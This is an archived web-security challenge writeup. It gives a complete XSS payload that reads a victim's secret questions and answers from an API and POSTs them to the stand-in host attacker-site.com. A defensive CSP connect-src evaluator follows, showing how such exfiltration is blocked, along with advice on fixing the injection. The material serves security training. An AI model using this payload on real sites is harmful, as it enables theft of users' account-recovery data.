This repository has been archived by the owner on Jun 2, 2022. It is now read-only.

TASK_21.md
Task 21 [Try Now]

Objectives:

  1. Find John's Secret Questions+Answers using an XSS vulnerability on this page
  2. Display the Questions+Answers in the div with id "result"
  3. Send the Questions+Answers to your Attack Server
  4. No Hardcoded values can be used - everything has to be figured out dynamically

The API documentation is served as XML, and because of objective 4 every value needed for the request has to be extracted from that XML at runtime rather than hardcoded.

The regexes used to pull those values out are `/<endpoint>(.+?)<\/endpoint>/`, `/<uid-param-value>(.+?)<\/uid-param-value>/` and `/<token-param-value>(.+?)<\/token-param-value>/`.

```javascript
// Step 1: fetch the API documentation linked from the first <a> on the page.
let xhr = new XMLHttpRequest();

xhr.onreadystatechange = function () {
  if (this.readyState == 4 && this.status == 200) {
    // Extract the endpoint path and the two request parameters from the XML docs
    // (matches objective 4: nothing is hardcoded).
    let ep = /<endpoint>(.+?)<\/endpoint>/.exec(this.responseText)[1];
    let uid = /<uid-param-value>(.+?)<\/uid-param-value>/.exec(this.responseText)[1];
    let tok = /<token-param-value>(.+?)<\/token-param-value>/.exec(this.responseText)[1];

    // Step 2: call the discovered endpoint on the same origin with those values.
    let xhr1 = new XMLHttpRequest();
    xhr1.onreadystatechange = function () {
      if (this.readyState == 4 && this.status == 200) {
        // Step 3: forward the response body to the attack server.
        let xhr2 = new XMLHttpRequest();
        xhr2.open("POST", "http://attacker-site.com", true);
        xhr2.setRequestHeader("Content-Type", "application/json");
        xhr2.send(this.responseText);
      }
    };

    xhr1.open("GET", location.origin + ep + "?uid=" + uid + "&token=" + tok, true);
    xhr1.send();
  }
};

xhr.open("GET", document.querySelector("a").href, true);
xhr.send();
```
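
As an added defender-side example that is not part of this writeup: the last step of the payload, the POST to `http://attacker-site.com`, is exactly the kind of request a `Content-Security-Policy` `connect-src` directive restricts. The simplified evaluator below shows that `connect-src 'self'` keeps the same-origin API call working while refusing the cross-origin exfiltration request. The victim origin `https://challenge.example`, the policies and the `/api/placeholder-endpoint` path are constructed for illustration and do not come from the challenge. It handles `'self'`, `'none'`, `*` and host sources with an optional scheme, port and leading `*.` wildcard, falling back to `default-src` when `connect-src` is absent; it does not implement the full CSP3 source-matching rules (for example scheme upgrades).

```javascript
// Added example, not code from the original writeup: a simplified evaluator for
// the CSP connect-src directive. It shows why `connect-src 'self'` would stop the
// payload's final POST to http://attacker-site.com while leaving the same-origin
// API request working. Covers 'self', 'none', '*' and host sources with an
// optional scheme, port and leading "*." wildcard, with default-src fallback;
// it does not implement the full CSP3 source-matching rules (e.g. scheme upgrades).

// Constructed values for illustration (not from the challenge).
const PAGE_ORIGIN = 'https://challenge.example';
const STRICT_POLICY = "default-src 'self'; connect-src 'self'";
const LOOSE_POLICY = "connect-src 'self' https://*.cdn.example";
// Placeholder standing in for whatever <endpoint> the XML docs would contain.
const API_REQUEST = PAGE_ORIGIN + '/api/placeholder-endpoint?uid=1&token=abc';
const EXFIL_REQUEST = 'http://attacker-site.com';

// Return the source list of a directive, or null if the policy lacks it.
function findDirective(policy, name) {
  for (const raw of policy.split(';')) {
    const tokens = raw.trim().split(/\s+/).filter(Boolean);
    if (tokens[0] === name) return tokens.slice(1);
  }
  return null;
}

function defaultPort(protocol) {
  if (protocol === 'https:') return '443';
  if (protocol === 'http:') return '80';
  return '';
}

function hostMatches(pattern, host) {
  if (pattern.startsWith('*.')) {
    const suffix = pattern.slice(1); // "*.cdn.example" -> ".cdn.example"
    return host.endsWith(suffix) && host.length > suffix.length;
  }
  return pattern === host;
}

// Does a single source expression permit a request to `target`?
function sourceAllows(source, target, pageOrigin) {
  if (source === "'self'") return target.origin === pageOrigin.origin;
  if (source === "'none'") return false;
  if (source === '*') return true;
  // host-source: [scheme://]host[:port]
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^:/]+)(?::(\d+|\*))?$/i.exec(source);
  if (!m) return false; // unsupported or malformed source expression: deny
  const [, scheme, host, port] = m;
  if (scheme && scheme.toLowerCase() + ':' !== target.protocol) return false;
  if (!hostMatches(host.toLowerCase(), target.hostname.toLowerCase())) return false;
  const targetPort = target.port || defaultPort(target.protocol);
  if (port && port !== '*' && port !== targetPort) return false;
  return true;
}

// Would the browser let an XHR/fetch from a page at `pageOrigin` reach `url`?
function connectAllowed(policy, pageOrigin, url) {
  const sources =
    findDirective(policy, 'connect-src') || findDirective(policy, 'default-src');
  if (sources === null) return true; // neither directive present: no restriction
  const target = new URL(url, pageOrigin);
  return sources.some((s) => sourceAllows(s, target, new URL(pageOrigin)));
}

// Evaluate both requests the payload makes under a given policy.
function evaluatePayload(policy) {
  return {
    apiAllowed: connectAllowed(policy, PAGE_ORIGIN, API_REQUEST),
    exfilAllowed: connectAllowed(policy, PAGE_ORIGIN, EXFIL_REQUEST),
  };
}

console.log('strict policy:', evaluatePayload(STRICT_POLICY)); // { apiAllowed: true, exfilAllowed: false }
console.log('no connect-src:', evaluatePayload("script-src 'self'")); // { apiAllowed: true, exfilAllowed: true }
```

A `connect-src` restriction only limits where injected script can send data; the injection sink itself still has to be fixed with context-appropriate output encoding, and the secret-questions endpoint's reliance on a token passed in the query string (which lands in server and proxy logs) is a separate weakness worth addressing.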

For POC, Click Here